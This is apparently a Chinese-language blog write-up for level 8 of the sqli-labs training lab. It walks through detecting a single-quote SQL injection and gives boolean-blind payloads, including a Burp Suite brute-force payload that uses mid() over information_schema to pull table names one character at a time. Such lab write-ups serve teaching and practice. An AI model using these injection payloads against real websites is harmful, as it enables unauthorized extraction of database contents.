sqllab第八关通关笔记

知识点:

  • 这里感觉是一个单纯的单引号绕过
  • bp爆破配置的条件和第七关一样

首先判断注入类型

构造id=1/0

回显成功

构造id=1'

错误回显,感觉又是一个单引号绕过

构造id=1''

正常回显了,说明不错,就是一个单引号绕过

构造payload:id=1' and 1=1 --+

正常回显,绝杀了

利用数据库名再试一下

构造id=1' and database()='security' --+

成功回显

接下来就是利用bp进行爆破了;设置和上一关一样

构造的payload:id=1%27+and+mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),§1§,1)=%27§e§%27--+

对相关设置进行配置;和第七关一样的爆破配置;最后也是需要进行过滤的;虽然这里的长度是不一样的,但是直接利用过滤和排序获取的信息更加的规整好看

10

相关推荐
周周记笔记2 小时前
学习笔记:第一个Python程序
笔记·学习
丑小鸭是白天鹅2 小时前
Kotlin协程详细笔记之切线程和挂起函数
开发语言·笔记·kotlin
潘达斯奈基~2 小时前
《大数据之路1》笔记2:数据模型
大数据·笔记
..过云雨2 小时前
05.【Linux系统编程】进程(冯诺依曼体系结构、进程概念、进程状态(注意僵尸和孤儿)、进程优先级、进程切换和调度)
linux·笔记·学习
咸甜适中2 小时前
rust语言 (1.88) egui (0.32.2) 学习笔记(逐行注释)(二十八)使用图片控件显示图片
笔记·学习·rust·egui
一又四分之一.2 小时前
高数基础知识(下)②
笔记
ZHANG8023ZHEN3 小时前
fMoE论文阅读笔记
论文阅读·笔记
Ro Jace4 小时前
文献阅读笔记:R&S电子战测试与测量技术文档
笔记
ZZHow10245 小时前
Maven入门_简介、安装与配置
java·笔记·maven
芜狄8 小时前
UCOSIII移植——学习笔记1
笔记·嵌入式硬件·学习·stm32f103rct6·ucosiii实时操作系统